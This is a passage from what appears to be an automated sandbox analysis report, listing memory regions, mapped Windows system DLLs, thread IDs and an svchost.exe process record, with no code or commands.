0x77a08fff entry_point = 0x77860000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 580 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 581 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 582 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 583 start_va = 0xfff20000 end_va = 0xfff2afff entry_point = 0xfff20000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 584 start_va = 0x7fef45e0000 end_va = 0x7fef4661fff entry_point = 0x7fef45e0000 region_type = mapped_file name = "swprv.dll" filename = "\\Windows\\System32\\swprv.dll" (normalized: "c:\\windows\\system32\\swprv.dll") Region: id = 585 start_va = 0x7fef7e80000 end_va = 0x7fef7e96fff entry_point = 0x7fef7e80000 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 586 start_va = 0x7fef9000000 end_va = 0x7fef9013fff entry_point = 0x7fef9000000 region_type = mapped_file name = "vss_ps.dll" filename = "\\Windows\\System32\\vss_ps.dll" (normalized: "c:\\windows\\system32\\vss_ps.dll") Region: id = 587 start_va = 0x7fef9020000 end_va = 0x7fef9029fff entry_point = 0x7fef9020000 region_type = mapped_file name = "virtdisk.dll" filename = "\\Windows\\System32\\virtdisk.dll" (normalized: "c:\\windows\\system32\\virtdisk.dll") Region: id = 588 start_va = 0x7fef9070000 end_va = 0x7fef9078fff entry_point = 0x7fef9070000 region_type = mapped_file name = "fltlib.dll" filename = "\\Windows\\System32\\fltLib.dll" (normalized: "c:\\windows\\system32\\fltlib.dll") Region: id = 589 start_va = 0x7fefb260000 end_va = 0x7fefb278fff entry_point = 0x7fefb260000 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 590 start_va = 0x7fefcda0000 end_va = 0x7fefcde6fff entry_point = 0x7fefcda0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 591 start_va = 0x7fefd0a0000 end_va = 0x7fefd0b6fff entry_point = 0x7fefd0a0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 592 start_va = 0x7fefd6a0000 end_va = 0x7fefd6aefff entry_point = 0x7fefd6a0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 593 start_va = 0x7fefd790000 end_va = 0x7fefd7a3fff entry_point = 0x7fefd790000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 594 start_va = 0x7fefd900000 end_va = 0x7fefd96afff entry_point = 0x7fefd900000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 595 start_va = 0x7fefdb80000 end_va = 0x7fefdc48fff entry_point = 0x7fefdb80000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 596 start_va = 0x7fefdc50000 end_va = 0x7fefdd26fff entry_point = 0x7fefdc50000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 597 start_va = 0x7fefdd30000 end_va = 0x7fefdd3dfff entry_point = 0x7fefdd30000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 598 start_va = 0x7fefdd40000 end_va = 0x7fefdd6dfff entry_point = 0x7fefdd40000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 599 start_va = 0x7fefed10000 end_va = 0x7fefed76fff entry_point = 0x7fefed10000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 600 start_va = 0x7fefed80000 end_va = 0x7fefee88fff entry_point = 0x7fefed80000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 601 start_va = 0x7feff0f0000 end_va = 0x7feff1cafff entry_point = 0x7feff0f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 602 start_va = 0x7feff1d0000 end_va = 0x7feff2fcfff entry_point = 0x7feff1d0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 603 start_va = 0x7feff560000 end_va = 0x7feff5f8fff entry_point = 0x7feff560000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 604 start_va = 0x7feff850000 end_va = 0x7feff86efff entry_point = 0x7feff850000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 605 start_va = 0x7feff870000 end_va = 0x7feffa72fff entry_point = 0x7feff870000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 606 start_va = 0x7feffa80000 end_va = 0x7feffb1efff entry_point = 0x7feffa80000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 607 start_va = 0x7feffb80000 end_va = 0x7feffb80fff entry_point = 0x7feffb80000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 608 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 609 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 610 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 611 start_va = 0x7fffffd7000 end_va = 0x7fffffd8fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 612 start_va = 0x7fffffd9000 end_va = 0x7fffffdafff entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 613 start_va = 0x7fffffdb000 end_va = 0x7fffffdcfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdb000" filename = "" Region: id = 614 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 615 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 616 start_va = 0x7fef7ea0000 end_va = 0x7fef804ffff entry_point = 0x7fef7ea0000 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Thread: id = 35 os_tid = 0x9f8 Thread: id = 36 os_tid = 0x9f4 Thread: id = 37 os_tid = 0x9f0 Thread: id = 38 os_tid = 0x9ec Thread: id = 39 os_tid = 0x9e4 Thread: id = 40 os_tid = 0x9fc Thread: id = 62 os_tid = 0x91c Process: id = "6" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x8da9000" os_pid = "0x268" os_integrity_level = "0x4000" os_privileges = "0x60a00000" monitor_reason = "rpc_server" parent_id = "4" os_parent_pid = "0xf0" cmd_line = "C:\\Windows\\system32\\svchost.exe -k NetworkService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\CryptSvc" [0xa], "NT SERVICE\\Dnscache" [0xe], "NT SERVICE\\LanmanWorkstation" [0xa], "NT SERVICE\\napagent" [0xa], "NT SERVICE\\NlaSvc" [0xa], "NT SERVICE\\TapiSrv" [0xa], "NT SERVICE\\TermService" [0xa], "NT SERVICE\\Wecsvc" [0xa], "NT SERVICE\\WinRM" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000e915" [0xc000000f], "LOCAL" [0x7] Region: id = 622 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 623 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 624 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 625 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 626 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 627 start_va = 0xc0000 end_va = 0xc1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 628 start_va = 0xd0000 end_va = 0xd0fff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 629 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 630 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 631 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 632 start_va = 0x110000 end_va = 0x110fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 633 start_va = 0x120000 end_va = 0x120fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 634 start_va = 0x130000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 635 start_va = 0x1b0000 end_va = 0x1c9fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 636 start_va = 0x1d0000 end_va = 0x1d0fff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 637 start_va = 0x1e0000 end_va = 0x1effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 638 start_va = 0x1f0000 end_va = 0x1fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 639 start_va = 0x200000 end_va = 0x20ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000200000" filename = "" Region: id = 640 start_va = 0x210000 end_va = 0x21ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 641 start_va = 0x220000 end_va = 0x22ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 642 start_va = 0x230000 end_va = 0x23ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 643 start_va = 0x240000 end_va = 0x240fff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 644 start_va = 0x250000 end_va = 0x25ffff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 645 start_va = 0x260000 end_va = 0x35ffff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 646 start_va = 0x360000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 647 start_va = 0x460000 end_va = 0x46ffff entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 648 start_va = 0x470000 end_va = 0x47ffff entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 649 start_va = 0x480000 end_va = 0x480fff entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 650 start_va = 0x490000 end_va = 0x491fff entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 651 start_va = 0x4a0000 end_va = 0x4affff entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 652 start_va = 0x4b0000 end_va = 0x4b4fff entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 653 start_va = 0x4c0000 end_va = 0x4c0fff entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 654 start_va = 0x4d0000 end_va = 0x4dffff entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 655 start_va = 0x4e0000 end_va = 0x4effff entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 656 start_va = 0x4f0000 end_va = 0x677fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 657 start_va = 0x680000 end_va = 0x800fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000680000" filename = "" Region: id = 658 start_va = 0x810000 end_va = 0x8cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000810000" filename = "" Region: id = 659 start_va = 0x8d0000 end_va = 0xcc2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008d0000" filename = "" Region: id = 660 start_va = 0xcd0000 end_va = 0xd8ffff entry_point = 0xcd0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 661 start_va = 0xd90000 end_va = 0xd90fff entry_point = 0x0 region_type = private name = "private_0x0000000000d90000" filename = "" Region: id = 662 start_va = 0xda0000 end_va = 0xdaffff entry_point = 0xda0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 663 start_va = 0xdb0000 end_va = 0xdbffff entry_point = 0xdb0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 664 start_va = 0xdc0000 end_va = 0xdcffff entry_point = 0xdc0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 665 start_va = 0xdd0000 end_va = 0xddffff entry_point = 0xdd0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 666 start_va = 0xde0000 end_va = 0xe5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000de0000" filename = "" Region: id = 667 start_va = 0xe60000 end_va = 0xe6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e60000" filename = "" Region: id = 668 start_va = 0xe70000 end_va = 0xe7ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e70000" filename = "" Region: id = 669 start_va = 0xe80000 end_va = 0xe8ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e80000" filename = "" Region: id = 670 start_va = 0xe90000 end_va = 0xe9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e90000" filename = "" Region: id = 671 start_va = 0xea0000 end_va = 0xeaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ea0000" filename = "" Region: id = 672 start_va = 0xeb0000 end_va = 0xebffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000eb0000" filename = "" Region: id = 673 start_va = 0xec0000 end_va = 0xecffff entry_point = 0xec0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 674 start_va = 0xed0000 end_va = 0xedffff entry_point = 0xed0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 675 start_va = 0xee0000 end_va = 0xeeffff entry_point = 0xee0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 676 start_va = 0xef0000 end_va = 0xefffff entry_point = 0xef0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 677 start_va = 0xf00000 end_va = 0xf0ffff entry_point = 0xf00000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 678 start_va = 0xf10000 end_va = 0xf1ffff entry_point = 0xf10000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 679 start_va = 0xf20000 end_va = 0xf2ffff entry_point = 0xf20000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 680 start_va = 0xf30000 end_va = 0x11fefff entry_point = 0xf30000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 681 start_va = 0x1200000 end_va = 0x127ffff entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Region: id = 682 start_va = 0x1280000 end_va = 0x128ffff entry_point = 0x1280000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 683 start_va = 0x1290000 end_va = 0x129ffff entry_point = 0x1290000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{127d0a1d-4ef2-11d1-8608-00c04fc295ee}\\catdb") Region: id = 684 start_va = 0x12a0000 end_va = 0x12affff entry_point = 0x12a0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 685 start_va = 0x12b0000 end_va = 0x12bffff entry_point = 0x12b0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 686 start_va = 0x1310000 end_va = 0x131ffff entry_point = 0x1310000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 687 start_va = 0x1320000 end_va = 0x132ffff entry_point = 0x1320000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 688 start_va = 0x1330000 end_va = 0x133ffff entry_point = 0x0 region_type = private name = "private_0x0000000001330000" filename = "" Region: id = 689 start_va = 0x1340000 end_va = 0x134ffff entry_point = 0x0 region_type = private name = "private_0x0000000001340000" filename = "" Region: id = 690 start_va = 0x1350000 end_va = 0x135ffff entry_point = 0x0 region_type = private name = "private_0x0000000001350000" filename = "" Region: id = 691 start_va = 0x1360000 end_va = 0x13dffff entry_point = 0x0 region_type = private name = "private_0x0000000001360000" filename = "" Region: id = 692 start_va = 0x13e0000 end_va = 0x13effff entry_point = 0x0 region_type = private name = "private_0x00000000013e0000" filename = "" Region: id = 693 start_va = 0x13f0000 end_va = 0x13fffff entry_point = 0x0 region_type = private name = "private_0x00000000013f0000" filename = "" Region: id = 694 start_va = 0x1400000 end_va = 0x1400fff entry_point = 0x0 region_type = private name = "private_0x0000000001400000" filename = "" Region: id = 695 start_va = 0x1410000 end_va = 0x1410fff entry_point = 0x0 region_type = private name = "private_0x0000000001410000" filename = "" Region: id = 696 start_va = 0x1420000 end_va = 0x142ffff entry_point = 0x0 region_type = private name = "private_0x0000000001420000" filename = "" Region: id = 697 start_va = 0x1450000 end_va = 0x14cffff entry_point = 0x0 region_type = private name = "private_0x0000000001450000" filename = "" Region: id = 698 start_va = 0x14e0000 end_va = 0x155ffff entry_point = 0x0 region_type = private name = "private_0x00000000014e0000" filename = "" Region: id = 699 start_va = 0x1560000 end_va = 0x15dffff entry_point = 0x0 region_type = private name = "private_0x0000000001560000" filename = "" Region: id = 700 start_va = 0x15f0000 end_va = 0x166ffff entry_point = 0x0 region_type = private name = "private_0x00000000015f0000" filename = "" Region: id = 701 start_va = 0x1680000 end_va = 0x16fffff entry_point = 0x0 region_type = private name = "private_0x0000000001680000" filename = "" Region: id = 702 start_va = 0x1760000 end_va = 0x17dffff entry_point = 0x0 region_type = private name = "private_0x0000000001760000" filename = "" Region: id = 703 start_va = 0x18c0000 end_va = 0x19bffff entry_point = 0x0 region_type = private name = "private_0x00000000018c0000" filename = "" Region: id = 704 start_va = 0x1a40000 end_va = 0x1abffff entry_point = 0x0 region_type = private name = "private_0x0000000001a40000" filename = "" Region: id = 705 start_va = 0x1ac0000 end_va = 0x1bbffff entry_point = 0x0 region_type = private name = "private_0x0000000001ac0000" filename = "" Region: id = 706 start_va = 0x1bd0000 end_va = 0x1bdffff entry_point = 0x0 region_type = private name = "private_0x0000000001bd0000" filename = "" Region: id = 707 start_va = 0x1c10000 end_va = 0x1c8ffff entry_point = 0x0 region_type = private name = "private_0x0000000001c10000" filename = "" Region: id = 708 start_va = 0x1ca0000 end_va = 0x1caffff entry_point = 0x0 region_type = private name = "private_0x0000000001ca0000" filename = "" Region: id = 709 start_va = 0x1cb0000 end_va = 0x1daffff entry_point = 0x0 region_type = private name = "private_0x0000000001cb0000" filename = "" Region: id = 710 start_va = 0x1dd0000 end_va = 0x1e4ffff entry_point = 0x0 region_type = private name = "private_0x0000000001dd0000" filename = "" Region: id = 711 start_va = 0x1e90000 end_va = 0x1f0ffff entry_point = 0x0 region_type = private name = "private_0x0000000001e90000" filename = "" Region: id = 712 start_va = 0x1f90000 end_va = 0x208ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 713 start_va = 0x20d0000 end_va = 0x214ffff entry_point = 0x0 region_type = private name = "private_0x00000000020d0000" filename = "" Region: id = 714 start_va = 0x21b0000 end_va = 0x222ffff entry_point = 0x0 region_type = private name = "private_0x00000000021b0000" filename = "" Region: id = 715 start_va = 0x2270000 end_va = 0x22effff entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 716 start_va = 0x2340000 end_va = 0x23bffff entry_point = 0x0 region_type = private name = "private_0x0000000002340000" filename = "" Region: id = 717 start_va = 0x23c0000 end_va = 0x24bffff entry_point = 0x0 region_type = private name = "private_0x00000000023c0000" filename = "" Region: id = 718 start_va = 0x24f0000 end_va = 0x24fffff entry_point = 0x0 region_type = private name = "private_0x00000000024f0000" filename = "" Region: id = 719 start_va = 0x2500000 end_va = 0x25fffff entry_point = 0x0 region_type = private name = "private_0x0000000002500000" filename = "" Region: id = 720 start_va = 0x2600000 end_va = 0x35fffff entry_point = 0x0 region_type = private name = "private_0x0000000002600000" filename = "" Region: id = 721 start_va = 0x77640000 end_va = 0x77739fff entry_point = 0x77640000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 722 start_va = 0x77740000 end_va = 0x7785efff entry_point = 0x77740000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 723 start_va = 0x77860000 end_va = 0x77a08fff entry_point = 0x77860000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 724 start_va = 0x77a30000 end_va = 0x77a36fff entry_point = 0x77a30000 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 725 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 726 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 727 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 728 start_va = 0xfff20000 end_va = 0xfff2afff entry_point = 0xfff20000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 729 start_va = 0x7fef4880000 end_va = 0x7fef4af9fff entry_point = 0x7fef4880000 region_type = mapped_file name = "esent.dll" filename = "\\Windows\\System32\\esent.dll" (normalized: "c:\\windows\\system32\\esent.dll") Region: id = 730 start_va = 0x7fef6d60000 end_va = 0x7fef6d67fff entry_point = 0x7fef6d60000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 731 start_va = 0x7fef7940000 end_va = 0x7fef7950fff entry_point = 0x7fef7940000 region_type = mapped_file name = "ssdpapi.dll" filename = "\\Windows\\System32\\ssdpapi.dll" (normalized: "c:\\windows\\system32\\ssdpapi.dll") Region: id = 732 start_va = 0x7fef7d00000 end_va = 0x7fef7d63fff entry_point = 0x7fef7d00000 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 733 start_va = 0x7fef7d70000 end_va = 0x7fef7de0fff entry_point = 0x7fef7d70000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 734 start_va = 0x7fef7df0000 end_va = 0x7fef7e27fff entry_point = 0x7fef7df0000 region_type = mapped_file name = "ncsi.dll" filename = "\\Windows\\System32\\ncsi.dll" (normalized: "c:\\windows\\system32\\ncsi.dll") Region: id = 735 start_va = 0x7fef7e30000 end_va = 0x7fef7e7dfff entry_point = 0x7fef7e30000 region_type = 